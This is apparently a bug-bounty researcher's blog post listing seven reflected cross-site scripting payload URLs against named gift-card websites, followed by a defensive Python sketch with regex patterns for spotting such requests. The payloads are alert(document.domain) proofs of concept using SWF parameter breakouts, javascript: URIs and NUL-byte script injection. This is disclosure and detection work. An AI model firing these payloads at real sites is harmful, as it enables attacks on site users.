My experiences with the GiftCards.com Bug Bounty Program
Since November 2013 I have reported seven Cross-site Scripting vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of them wasn’t a duplicate :-/. Strange? Perhaps, but not impossible given the simplicity of the vulnerabilities.
But what I really don’t understand: why do they still work today?
11/17/2013 Vulnerability #1: (DUP)
// Reflected Cross-site Scripting
http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}//
// Original advisory
11/17/2013 Vulnerability #2: - OK – Reward or not ;-)
// Reflected Cross-site Scripting (tested with FF 25.0.1)
http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
// Original Advisory
11/21/2013 Vulnerability #3: (DUP)
// Reflected Cross-site Scripting with SWF-Files (tested on Firefox 25.0.1)
http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain);
http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain);
11/26/2013 Vulnerability #4: (DUP)
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script>
12/05/2013 Vulnerability #5:
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script>
12/05/2013 Vulnerability #6:
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/member?%00"><script>alert(document.domain)</script>
12/05/2013 Vulnerability #7:
// Reflected Cross-site Scripting with IE10
http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script>
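A defensive triage sketch for the request shapes listed above, added here as an example and not part of the original post: it flags a NUL byte or script tag in the query string, and javascript: values or }catch( breakouts in parameters passed to .swf files. The function names, finding labels and sample request targets are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Heuristics modelled on the request shapes in this post (assumed, not exhaustive).
SCRIPT_TAG = re.compile(r"<\s*script\b", re.I)
JS_SCHEME = re.compile(r"(?:^|[=&])\s*javascript:", re.I)
CATCH_BREAKOUT = re.compile(r"\}\s*catch\s*\(", re.I)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value, errors="replace")
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_target):
    """Return the list of findings for one request target (path?query)."""
    path, _, query = request_target.partition("?")
    query = fully_decode(query)
    findings = []
    if "\x00" in query:
        findings.append("nul-byte-in-query")
    if SCRIPT_TAG.search(query):
        findings.append("script-tag-in-query")
    if path.lower().endswith(".swf"):
        if JS_SCHEME.search(query):
            findings.append("swf-javascript-scheme")
        if CATCH_BREAKOUT.search(query):
            findings.append("swf-script-breakout")
    return findings

# Constructed sample request targets (not taken from real logs).
SAMPLE_TARGETS = [
    "/order-status?%00%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
    "/swf/elf.swf?va_link=javascript:alert(document.domain);",
    "/wp-includes/js/swfupload/swfupload.swf?movieName=%22%5D);%7Dcatch(e)%7B%7D",
    "/swf/elf.swf?va_link=https://www.example.test/cards",
    "/order-status?id=12345",
]

def scan(targets):
    """Map each suspicious target to its findings; clean targets are omitted."""
    return {t: f for t in targets if (f := classify(t))}

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_TARGETS).items():
        print(findings, target)
```

Hits from a scan like this only point at requests worth reviewing; the reflection itself is closed by context-aware output encoding on the affected pages and by removing or updating the SWF files.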